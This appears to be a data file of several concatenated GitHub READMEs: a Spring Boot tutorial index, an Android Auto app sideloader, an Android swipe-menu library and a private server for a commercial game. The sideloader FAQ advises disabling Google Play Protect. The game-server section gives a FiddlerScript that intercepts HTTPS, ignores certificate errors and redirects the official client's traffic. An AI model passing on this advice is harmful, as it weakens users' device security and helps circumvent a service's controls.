👍 Recommended: [download the source of the latest (2021) hands-on projects](https://mp.weixin.qq.com/s?__biz=Mzg2OTA0Njk0OA==&mid=100018862&idx=1&sn=858e00b60c6097e3ba061e79be472280&chksm=4ea1856579d60c73224e4d852af6b0188c3ab905069fc28f4b293963fd1ee55d2069fb229848#rd) 👍 [PDF edition of the "JavaGuide Interview Crash Course"](#公众号). [Illustrated computer-science fundamentals, PDF edition](#优质原创PDF资源)

The book list has been moved to the [awesome-cs](https://github.com/CodingDocs/awesome-cs) repository.

<p align="center">
<a href="https://github.com/Snailclimb/springboot-guide" target="_blank">
	<img src="https://my-blog-to-use.oss-cn-beijing.aliyuncs.com/2019-7/spring-boot-guide.png" width=""/>
</a>
</p>

<p align="center">
  <a href="https://snailclimb.gitee.io/springboot-guide "><img src="https://img.shields.io/badge/阅读-read-brightgreen.svg" alt="阅读"></a>
  <a href="#联系我"><img src="https://img.shields.io/badge/chat-微信群-blue.svg" alt="微信群"></a>
  <a href="#公众号"><img src="https://img.shields.io/badge/%E5%85%AC%E4%BC%97%E5%8F%B7-JavaGuide-lightgrey.svg" alt="公众号"></a>
  <a href="#公众号"><img src="https://img.shields.io/badge/PDF-Java面试突击-important.svg" alt="公众号"></a>
</p>

**Read online**: https://snailclimb.gitee.io/springboot-guide (if the address above is slow for you, use this path instead)

**This project is open source so that everyone can improve it together. If you feel any content needs polishing or additions, issues and PRs are welcome.**

- GitHub: https://github.com/CodingDocs/springboot-guide
- Gitee: https://gitee.com/SnailClimb/springboot-guide (readers who cannot reach GitHub or find it slow can read the same content on Gitee)

## Key Topics

### Basics

1. [Introduction to Spring Boot](./docs/start/springboot-introduction.md)
2. [Your first Hello World](./docs/start/springboot-hello-world.md)
3. [Your first RESTful web service](./docs/basis/sringboot-restful-web-service.md)
4. [How to read configuration files elegantly in Spring](./docs/basis/read-config-properties.md)
5. **Exception handling**: [Several ways to handle exceptions in Spring Boot](./docs/advanced/springboot-handle-exception.md), [Spring Boot exception handling applied in real projects](./docs/advanced/springboot-handle-exception-plus.md)
6. **JPA**: [Spring Boot JPA basics: common operations explained](./docs/basis/springboot-jpa.md), [JPA's all-important join queries are this simple](./docs/basis/springboot-jpa-lianbiao.md)
7. **Interceptors and filters**: [Implementing a filter in Spring Boot](./docs/basis/springboot-filter.md), [Implementing an interceptor in Spring Boot](./docs/basis/springboot-interceptor.md)
8. **MyBatis**: [Integrating Spring Boot + MyBatis](./docs/basis/springboot-mybatis.md), [Multiple data sources with Spring Boot 2.0+ and MyBatis](./docs/basis/springboot-mybatis-mutipledatasource.md) (TODO: early articles, not recommended reading until they are reworked)
9. [MyBatis-Plus, from getting started to getting work done!](./docs/MyBatisPlus.md)
10. [Integrating the official Swagger starter + the knife4j enhancement in Spring Boot 2.0+](./docs/basis/swagger.md)

### Advanced

1. Bean mapping tools: [Apache BeanUtils vs Spring BeanUtils](./docs/advanced/Apache-BeanUtils-VS-SpringBean-Utils.md), [Performance comparison of 5 common bean mapping frameworks](./docs/advanced/Performance-of-Java-Mapping-Frameworks.md)
2. [How to validate parameters elegantly in Spring/Spring Boot?](./docs/spring-bean-validation.md) (a small sketch follows after these lists)
3. [Writing unit tests with PowerMockRunner and Mockito](./docs/PowerMockRunnerAndMockito.md)
4. [Understand scheduled tasks in Spring Boot in 5 minutes](./docs/advanced/SpringBoot-ScheduleTasks.md)
5. [A beginner-friendly guide to asynchronous programming with Spring Boot](./docs/advanced/springboot-async.md)
6. [Kafka introduction + Spring Boot/Kafka integration series](https://github.com/Snailclimb/springboot-kafka)
7. [Super detailed and beginner-friendly! Building a distributed service with Spring Boot + Dubbo](./docs/advanced/springboot-dubbo.md)
8. [From zero! Spring Security with JWT (including authorization)](https://github.com/Snailclimb/spring-security-jwt-guide)

### Extras

1. [Basic usage of `@PostConstruct` and `@PreDestroy`, and their replacements in Java 9+](./docs/basis/@PostConstruct与@PreDestroy.md)
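Related to the parameter-validation entry above (item 2 in the Advanced list), here is a minimal, self-contained sketch of bean validation in a Spring Boot 2.x controller. `PersonRequest`, the endpoint path, and the messages are illustrative assumptions rather than content from the linked article, and on Spring Boot 2.3+ the `spring-boot-starter-validation` dependency must be on the classpath:

```java
import javax.validation.Valid;
import javax.validation.constraints.Max;
import javax.validation.constraints.NotBlank;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

// Hypothetical request DTO: the constraint annotations declare the rules.
class PersonRequest {

    @NotBlank(message = "name must not be blank")
    private String name;

    @Max(value = 150, message = "age must be at most 150")
    private Integer age;

    public String getName() { return name; }
    public void setName(String name) { this.name = name; }
    public Integer getAge() { return age; }
    public void setAge(Integer age) { this.age = age; }
}

@RestController
@RequestMapping("/api/persons")
public class PersonController {

    // @Valid makes Spring validate the request body before the method runs;
    // a violation raises MethodArgumentNotValidException, which Spring maps
    // to an HTTP 400 by default (or via a @RestControllerAdvice handler).
    @PostMapping
    public String create(@Valid @RequestBody PersonRequest request) {
        return "created: " + request.getName();
    }
}
```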
## Hands-on Projects

1. [Build an online file-preview system with Spring Boot! Supports previewing ppt, doc, and many other file types](./docs/projects/kkFileView-SpringBoot在线文件预览系统.md)
2. [Analysis of a Spring Boot admin system with separated front and back ends! Modular development, RBAC permission control...](https://mp.weixin.qq.com/s?__biz=Mzg2OTA0Njk0OA==&mid=2247495011&idx=1&sn=f574f5d75c3720d8b2a665d1d5234d28&chksm=cea1a2a8f9d62bbe9f13f5a030893fe3da6956c4be41471513e6247f74cba5a8df9941798b6e&token=212861022&lang=zh_CN#rd)
3. [An interview question-drilling system based on Spring Cloud](./docs/projects/SpringCloud刷题系统.md)
4. [An online exam system based on Spring Boot](./docs/projects/一个基于SpringBoot的在线考试系统.md)

## Notes

1. The project logo was generated with [logoly](https://logoly.pro/#/).
2. The documentation is generated with docsify and deployed on GitHub Pages and Gitee Pages: [docsify introduction](https://docsify.js.org/#/)

### Original high-quality PDF resources

![](https://cdn.jsdelivr.net/gh/javaguide-tech/blog-images-2@main/%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%93%E4%B8%9A/image-20201027160348395.png)

### WeChat public account

If you want to follow my new articles and the material I share in real time, you can follow my public account.

**"Java Interview Crash Course"**: the interview-focused V2.0 PDF derived from this document is free — reply **"Java面试突击"** in the [public account](#公众号) backend to receive it!

**Must-have learning resources for Java engineers**: reply the keyword **"1"** in the public account backend to get commonly used Java engineering learning resources, free and with no strings attached.

![My public account](https://my-blog-to-use.oss-cn-beijing.aliyuncs.com/2019-6/167598cd2e17b8ec.png)
0
shmykelsa/AAAD
null
null
# AAAD

[![Crowdin](https://badges.crowdin.net/aaad/localized.svg)](https://crowdin.com/project/aaad)

![banner](https://i.imgur.com/EeT5Y3v.png)

Android Auto Apps Downloader (AAAD) is an app for Android phones that downloads popular Android Auto 3rd party apps and installs them in the correct way to have them in Android Auto.

For the first time in 3 years, users with **non-rooted Android devices** can now enjoy these apps made for Android Auto, and Android Auto Apps Downloader does it all for you. Simply select an app you want to install on your phone and the download will begin. Once completed, install the given app with the classic Android interface and you can start enjoying the app you've just downloaded on Android Auto.

### No need for a PC. No developer options. No grabbing and patching APKs. No root needed

AAAD can be easily installed on any Android phone, and the whole installation process takes place only on it. You will not need to activate developer settings, neither in the main settings nor in Android Auto.

The main goal of this app is having the listed apps in Android Auto with a pain-free experience and, most of all, without requiring a rooted phone. If you are instead running a rooted device, you might want to consider the free alternative [AA AIO TWEAKER](https://github.com/shmykelsa/AA-Tweaker), which has an alternative root method to patch the apps and a lot of other cool features that you can activate or pre-activate on Android Auto!

AAAD is free and offers in-app purchases. The free version of the app allows up to 1 download every 30 days. With the PRO version you can enjoy the full experience and download as many times as you want, forever!

# 🚨🚨‼‼ KNOWN ISSUES ‼‼🚨🚨

**Oppo/Realme/OnePlus devices won't show apps or "No messages during drive"** - Please apply [this fix](https://github.com/shmykelsa/AAAD/wiki/Fix-for-OnePlus-Realme-Oppo)

**Google Pixel: "No new messages during drive" - Android 13** - Please apply [this fix](https://github.com/shmykelsa/AAAD/wiki/Fix-for-Pixel-Android-13-) before installing

**Android 14: Not compatible as of now**

**"This organization is currently ineligible to receive donations"** - Please download AAAD only from this website; 3rd party downloads are not authorized, endorsed nor supported by our staff

**GiroPay/Ideal/Przelewy24/Bancontact/EPS payment has not been recognized by the app** - Please follow [this link](mailto:help.aaad@gmail.com?subject=AAADSI&body=Hello%2C%0D%0A%0D%0Athis%20is%20a%20pre-formatted%20e-mail.%20Please%20DO%20NOT%20edit%20the%20subject%20above%20and%20modify%20the%20e-mail%20with%20the%20right%20details.%20After%20sending%20the%20e-mail%20you%20will%20receive%20instructions%20on%20how%20to%20activate%20from%20email%20help.aaad%2Bcanned.response%40gmail.com.%20Please%20also%20check%20spam%20folder%20if%20nothing%20came%20to%20you.%0D%0A%0D%0AMethod%20of%20payment%3A%0D%0ALast%20four%20(4)%20digits%20of%20the%20card%20used%20(if%20applicable)%3A%0D%0ADate%20(and%20time%20if%20possible)%3A%0D%0AFull%20name%3A%0D%0A%0D%0A)

**Fermata Auto download shows "App not responding (wait or close)"** - Fermata is quite heavy to download and GitHub servers are not the easiest with downloads. Please keep pressing "wait". If it does fail, open the top menu, select help, and contact us through the app describing the steps you take to reproduce the issue.
**A factory reset wipes the license away** - [Click here](mailto:help.aaad@gmail.com?subject=PROWIPED&body=Hello%2C%0D%0A%0D%0Amy%20license%20was%20lost%20after%20a%20device%20reset.%0D%0A%0D%0AThe%20e-mail%20I%E2%80%99ve%20registered%20for%20my%20payment%20is%3A%20****MODIFY%20HERE****%0D%0A%0D%0ARegards%0D%0A%0D%0A>)

**Google Play Protect erased the downloaded apps** - There's a deeper explanation [down here](#i-have-a-warning-from-google-play-protect-warning-me-about-your-app-is-this-app-a-malware). Please take a deep look before proceeding with installing any app. The install button is usually hidden, and the big blue button **WILL NOT** install the app you've chosen. Please use the "Install anyway" button instead.

### [GO TO DOWNLOAD](https://github.com/shmykelsa/AAAD/releases)

### Updates

If you want to stay updated with development, you can check out the [dedicated Telegram Channel](https://t.me/AAADupdates).

Be sure to watch the repository with the banner on the top right; you will be notified via mail if AAAD gets updated (GitHub account needed)! Star us if you really think AAAD is a good piece of software :)

The PRO version of the app can be activated directly and automatically inside the app. A license is bound to one device, and your PRO or FREE status (including the date of the next download) will survive an uninstall of the app.

# Notes

Android Auto Apps Downloader **does not guarantee** in any way that the provided apps available for installing will actually work on Android Auto. The installing method can fail anytime if Google applies changes to Android Auto. Any software installed by Android Auto Apps Downloader is provided "as is", and no support can be given by me for malfunctioning apps or a malfunctioning Android Auto.

# F.A.Q.

### How can I have support for this app?

You can contact the help team through the AAAD app (top right menu > "help"). We are a very small team working from Italy, so please be patient with us in case you write to us overnight!

### How do I obtain a license?

To get started, press the bottom text of the AAAD app.

### Can I pay for a license outside the app?

Sure you can. Feel free to [pay through Stripe](https://buy.stripe.com/14k5mQ3ih6l7dMs8ww) or donate any amount (equal to or bigger than the asking price - 3.50 EUR) [via PayPal](https://www.paypal.com/donate/?hosted_button_id=V666UVPT9C5CJ), and keep the donation receipt (bank statement, confirmation page, e-mail etc.). Then please [click here](mailto:help.aaad@gmail.com?subject=%5BGW%5D&body=Please%20don%E2%80%99t%20modify%20the%20subject%20above%20and%20feel%20free%20to%20modify%20this%20body%20leaving%20a%20small%20thought.%20An%20automatic%20response%20will%20then%20guide%20you%20to%20the%20following%20steps%20%3A)) or write an e-mail to help.aaad@gmail.com with "[GW]" in the subject, and be sure to also include a small thought :). An automatic reply will then guide you through the steps to take afterwards.

### What will a license of AAAD give me?

The license for AAAD PRO will give you access to unlimited downloads.

### Do I have to buy a license to have the apps working while the vehicle is not parked?

No. AAAD PRO only gives access to unlimited downloads.

### I've downloaded the app "xxx" from AAAD but it's not working well. What can I do?

The best thing is to ask the app's developer, as we do not offer support for the apps inside AAAD. The apps are provided "as-is"; being developed by someone else, nobody from AAAD will be able to give proper technical support for them.
As long as the app is listed on Android Auto — apart from the "No new messages during drive" bug — AAAD is working just as designed. If your app is not listed at all, or suffers from "No new messages during drive", contact help through the AAAD app (top right menu > "help").

### Why the heck do I need this app? Can't I just install the apps by myself?

Well yes, you could, but they would not appear in Android Auto. Since the beginning of 2018, custom apps for Android Auto are blocked by Google, but AAAD installs them in a special way so that the apps actually show up on Android Auto. And no root is needed! Call it magic, if you will. If you have a rooted phone, check out [AA AIO TWEAKER](https://github.com/shmykelsa/AA-Tweaker) instead.

### I have a warning from Google Play Protect warning me about your app! Is this app a malware?

AAAD does not contain any malware, and neither do the apps inside it. Google obviously doesn't like Android Auto modding because of driving security. If you want to avoid any warning, you should know that Google Play Protect does not really have an anti-virus feature; rather, it warns about apps that Google dislikes for various reasons (e.g. installing other apps like the Google Play Store does, or containing a third-party in-app purchase system). You can safely disable it by heading into the Google Play Store's settings.

### Why only these apps? Where is YouTube? Where is Netflix? Where is Instagram?

Not all apps are compatible with Android Auto. You can't just pick an app and sledge-hammer it into Android Auto. As a rule of thumb, no app from the Google Play Store will ever be included in AAAD (unless such an app has a different APK distributed on another platform). Apps coming from the Play Store are automatically available on Android Auto. Obviously, Google allows only certain types of apps on its store (navigation, music, messages, VOIP). Whenever an app implements Android Auto functionality, it cannot fall into a category different from the ones allowed by Google. AAAD includes basically almost every Android Auto app known to date, and the only responsibility of AAAD is to make them available in Android Auto. If you know for sure there's an app compatible with Android Auto that is not included in AAAD, write to [submit.aaad@gmail.com](mailto:submit.aaad@gmail.com)

### How do I update the apps installed from AAAD?

AAAD will always download the latest version of an app. If one of the apps that you've installed through AAAD gets an update, you can open AAAD and download the update. At the moment there's no update checker, but I'm planning on making one!

### Will you hold my bank account/credit card information?

No. All payment details are held by Stripe Inc. and are neither processed by nor passed to me in any way. Also, I don't really care.

### Will this app be available on the Play Store?

No. It is only officially distributed on GitHub.

### Does the license have an expiration date?

No. AAAD is not a subscription; once a license is obtained, you won't be charged anymore.

### What happens if I change my device?

You can transfer a license with the "Transfer license" feature in the top right menu. The license is encrypted inside the device with a key that we do not hold in any way, and the above method is the only way to move an AAAD PRO license.

### What happens if I uninstall AAAD?

Nothing. The date of your next download will not be impacted, and neither will your AAAD PRO version.
# License

Part of the source code of the app is shared so that changes can be implemented by whoever wants to do so for personal use. The full version of the software is **NOT** free, and you are not allowed to redistribute modified versions of it, neither as a free application nor as a commercial product. If you intend to do so, please seek my explicit written approval first. You are, however, allowed to modify the software as you wish, as long as the modified version is **only** ever used by yourself. For more information, [please read the EULA](https://github.com/shmykelsa/AAAD/blob/main/LICENSE).

### Copyright

Gabriele Rizzo (shmykelsa) © - 2023 - Lecce, Italia
0
mcxtzhang/SwipeDelMenuLayout
The simplest SwipeMenu in history: zero coupling, supports any ViewGroup. One-step integration of a swipe (delete) menu, closely imitating QQ and iOS.
listview recyclerview sideslip-menu slide viewgroup
# SwipeDelMenuLayout

[![](https://jitpack.io/v/mcxtzhang/SwipeDelMenuLayout.svg)](https://jitpack.io/#mcxtzhang/SwipeDelMenuLayout)

#### [中文版文档](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/README-cn.md)

Related blogs:

V1.0: http://blog.csdn.net/zxt0601/article/details/52303781

V1.2: http://blog.csdn.net/zxt0601/article/details/53157090

If you like it, please give me a star — thank you very much.

## Where to find me:

Github: https://github.com/mcxtzhang

CSDN: http://blog.csdn.net/zxt0601

gold.xitu.io: http://gold.xitu.io/user/56de210b816dfa0052e66495

jianshu: http://www.jianshu.com/users/8e91ff99b072/timeline

***

# Important: this is not tied to RecyclerView or ListView — it works with any ViewGroup.

# Intro

This control has now been in production use in our project for over seven months, and more than two months have passed since it was first pushed to GitHub. (I previously published an article — portal: http://gold.xitu.io/entry/57d1115dbf22ec005f9593c6/detail — which describes in detail how the V1.0 version was built.) During that time many friends suggested improvements in the comments and in the issues — such as a configurable swipe direction (left or right), a faithful imitation of QQ's interaction, GridLayoutManager support — and reported some bugs. I have implemented all the requests, fixed the bugs, and packaged the library on JitPack so it is more convenient to pull in. Compared with the first edition a lot has changed, hence this new version of the document. It starts with how to use the control, then introduces the features it contains and the supported attributes, and finally covers a few tricky points and conflict resolutions.

ItemDecorationIndexBar + SwipeMenuLayout (the biggest charm of this control is its zero coupling — so first see it combined with another library of mine): (ItemDecorationIndexBar: https://github.com/mcxtzhang/ItemDecorationIndexBar)

![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/ItemDecorationIndexBar_SwipeDel.gif)

Using it casually in a flow layout is just as easy:

![](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/FlowSwipe.gif)

Android-style version (non-blocking: while one item's menu is open, another item's menu can still be swiped open, and the previous one closes automatically):

![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/LinearLayoutManager1.gif)

GridLayoutManager (compared with the code above, only the RecyclerView's LayoutManager needs to change):

![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/grid.gif)

LinearLayout (without any modification, even a plain LinearLayout gets a swipe menu):

![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/linear.gif)

iOS-style interaction (blocking, closely imitating QQ: while a swipe menu is open, all operations on other items are blocked):

![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/iOS.gif)

Use in a ViewPager:

![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/viewpager.gif)

# Usage:

Step 1. Add the JitPack repository to your build file. Add it to your root build.gradle at the end of repositories:

```
allprojects {
    repositories {
        ...
        maven { url "https://jitpack.io" }
    }
}
```

Step 2. Add the dependency

```
dependencies {
    compile 'com.github.mcxtzhang:SwipeDelMenuLayout:V1.3.0'
}
```

Step 3.
Wrap this control around the ContentItem that needs the swipe-delete menu, and inside it lay out the ContentItem first, followed by the menu views in order. **At this point you already have iOS/QQ-style swipe-delete menus.** (Click events for the swipe menu are obtained by id, just like for any other control, so they are not covered again here.)

In the demo my ContentItem is a TextView, so I nest the control around it and then arrange the menu controls after it, in order:

```
<?xml version="1.0" encoding="utf-8"?>
<com.mcxtzhang.swipemenulib.SwipeMenuLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="match_parent"
    android:layout_height="100dp"
    android:clickable="true"
    android:paddingBottom="1dp">

    <TextView
        android:id="@+id/content"
        android:layout_width="match_parent"
        android:layout_height="match_parent"
        android:background="?android:attr/selectableItemBackground"
        android:gravity="center"
        android:text="项目中我是任意复杂的原ContentItem布局"/>

    <!-- The swipe menu items, laid out in order -->
    <Button
        android:id="@+id/btnTop"
        android:layout_width="60dp"
        android:layout_height="match_parent"
        android:background="#d9dee4"
        android:text="置顶"
        android:textColor="@android:color/white"/>

    <Button
        android:id="@+id/btnUnRead"
        android:layout_width="120dp"
        android:layout_height="match_parent"
        android:background="#ecd50a"
        android:clickable="true"
        android:text="标记未读"
        android:textColor="@android:color/white"/>

    <Button
        android:id="@+id/btnDelete"
        android:layout_width="60dp"
        android:layout_height="match_parent"
        android:background="@color/red_ff4a57"
        android:text="删除"
        android:textColor="@android:color/white"/>
</com.mcxtzhang.swipemenulib.SwipeMenuLayout>
```

**One tip**: when used in a ListView or RecyclerView, click events must be set on the ContentItem inside the Adapter — ListView.setOnItemClickListener cannot be used, because the item is this whole control rather than just the ContentItem area, and the control's touch area includes both the ContentItem and the swipe menu (a sketch follows after the Speciality list below).

---

# Attributes:

1. The isIos flag controls whether the iOS-style blocking interaction is used; it is on by default.

2. The isSwipeEnable flag controls whether the swipe menu is enabled; it is on by default. (In some scenarios items are reused, and a user without edit permission must not be able to swipe the menu open.)

3. The isLeftSwipe flag switches between left-swipe and right-swipe.

How to set them — one way, in XML:

```xml
<com.mcxtzhang.swipemenulib.SwipeMenuLayout
    xmlns:app="http://schemas.android.com/apk/res-auto"
    app:ios="false"
    app:leftSwipe="true"
    app:swipeEnable="true">
```

The other way, in Java code:

```java
// Turn off the iOS blocking interaction, then set the swipe direction, then disable the swipe menu
((SwipeMenuLayout) holder.itemView).setIos(false).setLeftSwipe(position % 2 == 0 ? true : false).setSwipeEnable(false);
```

# Speciality:

* No two (or more) swipe menus are open at the same time: at most one swipe menu is visible on screen.
* While swiping, the parent's vertical scrolling is blocked.
* With multi-touch, only the first finger is tracked; touches from additional fingers on the screen are ignored.
* A get() method for the view cache is provided; use it, for example, to close the open swipe menu when the user clicks outside of it.
* The width of the first child (i.e. the ContentItem) controls the width of the whole control.
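To make the tip above concrete, here is a minimal sketch of wiring the click events inside a RecyclerView adapter. The view ids match the XML above; `MyAdapter`, `MyViewHolder`, the `R.layout.item_swipe_menu` layout name, and the data list are illustrative assumptions (and newer projects would use the `androidx` import instead of the support library) — treat this as a sketch, not part of the library:

```java
import android.support.v7.widget.RecyclerView;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.Button;
import android.widget.TextView;
import java.util.List;

public class MyAdapter extends RecyclerView.Adapter<MyAdapter.MyViewHolder> {
    private final List<String> mData;

    public MyAdapter(List<String> data) {
        this.mData = data;
    }

    static class MyViewHolder extends RecyclerView.ViewHolder {
        TextView content;
        Button btnDelete;

        MyViewHolder(View itemView) {
            super(itemView);
            // Ids from the XML above: the ContentItem and one menu button.
            content = (TextView) itemView.findViewById(R.id.content);
            btnDelete = (Button) itemView.findViewById(R.id.btnDelete);
        }
    }

    @Override
    public MyViewHolder onCreateViewHolder(ViewGroup parent, int viewType) {
        // item_swipe_menu is a hypothetical name for the layout shown above.
        View v = LayoutInflater.from(parent.getContext())
                .inflate(R.layout.item_swipe_menu, parent, false);
        return new MyViewHolder(v);
    }

    @Override
    public void onBindViewHolder(final MyViewHolder holder, int position) {
        holder.content.setText(mData.get(position));

        // Click on the ContentItem area -- set here in the adapter,
        // NOT via ListView#setOnItemClickListener.
        holder.content.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                // handle the item click
            }
        });

        // Click on the "delete" button inside the swipe menu.
        holder.btnDelete.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                int pos = holder.getAdapterPosition();
                mData.remove(pos);
                notifyItemRemoved(pos); // keeps the removal animation
            }
        });
    }

    @Override
    public int getItemCount() {
        return mData.size();
    }
}
```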
# Checklist:

In past iterations, completing a feature or fixing a bug occasionally introduced a new bug, so here is a checklist to verify after every iteration; only when everything passes is the library pushed to GitHub.

feature | desc | verify
--- | --- | ---
isIos | switching to the iOS blocking interaction mode works, and the non-blocking Android-style interaction still works normally |
isSwipeEnable | the swipe menu can be disabled |
isLeftSwipe | both swipe directions are supported |
The ContentItem content can be clicked | |
The ContentItem content can be long-pressed | |
With the swipe menu open, the ContentItem cannot be clicked | |
With the swipe menu open, the ContentItem cannot be long-pressed | |
With the swipe menu open, the menu items can be clicked | |
With the swipe menu open, clicking the ContentItem area closes the menu | |
While swiping, long-press events are blocked | |
Closing the menu by swiping does not trigger the ContentItem click event | |

**In addition**, in a ListView, if clicking a swipe-menu option should also close the menu, cast the ItemView to CstSwipeDelMenu and call `quickClose()`, for example:

`((CstSwipeDelMenu) holder.getConvertView()).quickClose();`

RecyclerView is recommended instead. In RecyclerView, use `mAdapter.notifyItemRemoved(pos)` when deleting, otherwise there is no removal animation; and to close the swipe menu at the same time, also call:

`((CstSwipeDelMenu) holder.itemView).quickClose();`

(See the sketch after the update log below.)

---

### Update log ###

2017-09-27 update:

* Solved sliding conflicts inside a ViewPager with CstViewPager. Because ViewPager and SwipeMenuLayout are both horizontal sliding controls, they conflict when used together. With CstViewPager you can use the left-swipe menu on the first page of the ViewPager and the right-swipe menu on the last page.

2016-12-07 update:

* Fixed a bug: in a ListView, a quick swipe followed by a quick click on the delete menu caused the next item to be swiped open.

2016-12-07 update:

* When isSwipeEnable is false, the click event of the ContentItem is undisturbed.

2016-11-14 update:

* Padding is now supported (slide up/down is planned to follow), so the margin attributes of the ContentItem are no longer supported.
* The rebound animation was adjusted to be smoother.
* Fixed a bug where a tiny movement did not rebound.

2016-11-09 update:

1. Adapted to GridLayoutManager; the width of the first child (i.e. the ContentItem) controls the width of the control.
2. When using it, if the layout needs to fill its parent, remember to give the first child (the ContentItem) a width of match_parent.

2016-11-04 update:

1. Optimized the relationship between long-press events and swiping, following QQ as closely as possible.

2016-11-03 update:

1. If the finger has moved a sliding distance from its starting point, all click events are blocked (QQ-like interaction).

2016-10-21 update:

1. Fixed a bug when the parent control's width did not fill the screen.
2. Imitating QQ: with a swipe menu open, clicking any region except the swipe menu (including the menu's contents) closes the menu.

2016-10-21 update:

1. Added a get() method for the view cache, which can be used to close the open swipe menu when the user clicks outside of it.

2016-09-30 update:

1. Support for swiping in both directions.

![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/doubleSwipe.gif)

2016-09-28 update:

1. Added an example of setting item click events.

2016-09-12 update:

1. Added complete demos with RecyclerView and ListView, for reference by those not yet using them.
2. Added a quickClose() method, which is handy in a ListView — though RecyclerView is still recommended.

---
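Tying the `quickClose()` note above to RecyclerView deletion, here is a minimal sketch. It reuses the illustrative holder from the adapter sketch earlier and assumes the inflated item root is the `SwipeMenuLayout` from the XML above (the note's `CstSwipeDelMenu` appears to be the older class name) — an assumption-laden example, not library documentation:

```java
// Inside onBindViewHolder (see the illustrative adapter sketch above):
holder.btnDelete.setOnClickListener(new View.OnClickListener() {
    @Override
    public void onClick(View v) {
        // Close the open swipe menu first, as the note above recommends.
        // Assumption: holder.itemView is the SwipeMenuLayout root from the XML.
        ((SwipeMenuLayout) holder.itemView).quickClose();

        int pos = holder.getAdapterPosition();
        mData.remove(pos);
        // notifyItemRemoved keeps RecyclerView's delete animation.
        notifyItemRemoved(pos);
    }
});
```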
0
Melledy/LunarCore
A game server reimplementation for a certain turn-based anime game
game-server
![LunarCore](https://socialify.git.ci/Melledy/LunarCore/image?description=1&descriptionEditable=A%20game%20server%20reimplementation%20for%20version%202.1.0%20of%20a%20certain%20turn-based%20anime%20game%20for%20educational%20purposes.%20&font=Inter&forks=1&issues=1&language=1&name=1&owner=1&pulls=1&stargazers=1&theme=Light)

<div align="center"><img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/Melledy/LunarCore?logo=java&style=for-the-badge"> <img alt="GitHub" src="https://img.shields.io/github/license/Melledy/LunarCore?style=for-the-badge"> <img alt="GitHub last commit" src="https://img.shields.io/github/last-commit/Melledy/LunarCore?style=for-the-badge"> <img alt="GitHub Workflow Status" src="https://img.shields.io/github/actions/workflow/status/Melledy/LunarCore/build.yml?branch=development&logo=github&style=for-the-badge"></div>

<div align="center"><a href="https://discord.gg/cfPKJ6N5hw"><img alt="Discord - Grasscutter" src="https://img.shields.io/discord/1163718404067303444?label=Discord&logo=discord&style=for-the-badge"></a></div>

[EN](README.md) | [简中](docs/README_zh-CN.md) | [繁中](docs/README_zh-TW.md) | [JP](docs/README_ja-JP.md) | [RU](docs/README_ru-RU.md) | [FR](docs/README_fr-FR.md) | [KR](docs/README_ko-KR.md) | [VI](docs/README_vi-VI.md)

**Attention:** For any extra support, questions, or discussions, check out our [Discord](https://discord.gg/cfPKJ6N5hw).

### Notable features

- Basic game features: logging in, team setup, inventory, basic scene/entity management
- Monster battles working
- Natural world monster/prop/NPC spawns
- Character techniques
- Crafting/consumables working
- NPC shops handled
- Gacha system
- Mail system
- Friend system (assists are not working yet)
- Forgotten Hall
- Pure Fiction
- Simulated Universe (runs can be finished, but many features are missing)

# Running the server and client

### Prerequisites

* [Java 17 JDK](https://www.oracle.com/java/technologies/javase/jdk17-archive-downloads.html)

### Recommended

* [MongoDB 4.0+](https://www.mongodb.com/try/download/community)

### Compiling the server

1. Open your system terminal and compile the server with `./gradlew jar`
2. Create a folder named `resources` in your server directory
3. Download the `Config`, `TextMap`, and `ExcelBin` folders from [https://github.com/Dimbreath/StarRailData](https://github.com/Dimbreath/StarRailData) and place them into your resources folder.
4. Delete the `/resources/Config/LevelOutput` folder.
5. Download the `Config` folder from [https://gitlab.com/Melledy/LunarCore-Configs](https://gitlab.com/Melledy/LunarCore-Configs) and place it into your resources folder. It contains the world spawns and is very important for the server.
6. Run the server with `java -jar LunarCore.jar` from your system terminal. Lunar Core comes with a built-in internal MongoDB server for its database, so no MongoDB installation is required. However, it is highly recommended to install MongoDB anyway.

### Connecting with the client (Fiddler method)

1. **Log in with the client to an official server and Hoyoverse account at least once to download game data.**
2. Install and have [Fiddler Classic](https://www.telerik.com/fiddler) running.
3. Set Fiddler to decrypt HTTPS traffic (Tools -> Options -> HTTPS -> Decrypt HTTPS traffic). Make sure `ignore server certificate errors` is checked as well.
4.
4. Copy and paste the following code into the FiddlerScript tab of Fiddler Classic:

```
import System; import System.Windows.Forms; import Fiddler; import System.Text.RegularExpressions;

class Handlers {
    static function OnBeforeRequest(oS: Session) {
        if (oS.host.EndsWith(".starrails.com") || oS.host.EndsWith(".hoyoverse.com") || oS.host.EndsWith(".mihoyo.com") || oS.host.EndsWith(".bhsr.com")) {
            oS.host = "localhost"; // This can also be replaced with another IP address.
        }
    }
};
```

5. If `autoCreateAccount` is set to true in the config, then you can skip this step. Otherwise, type `/account create [account name]` in the server console to create an account.
6. Log in with your account name; the password field is ignored by the server and can be set to anything.

### Server commands

Server commands can be run in the server console or in-game. There is a dummy user named "Server" in every player's friends list that you can message to use in-game commands.

```
/account {create | delete} [username] (reserved player uid). Creates or deletes an account.
/avatar lv(level) p(ascension) r(eidolon) s(skill levels). Sets the current avatar's properties.
/clear {relics | lightcones | materials | items}. Removes filtered items from the player inventory.
/gender {male | female}. Sets the player's gender.
/give [item id] x[amount] lv[number]. Gives the targeted player an item.
/giveall {materials | avatars | lightcones | relics}. Gives the targeted player items.
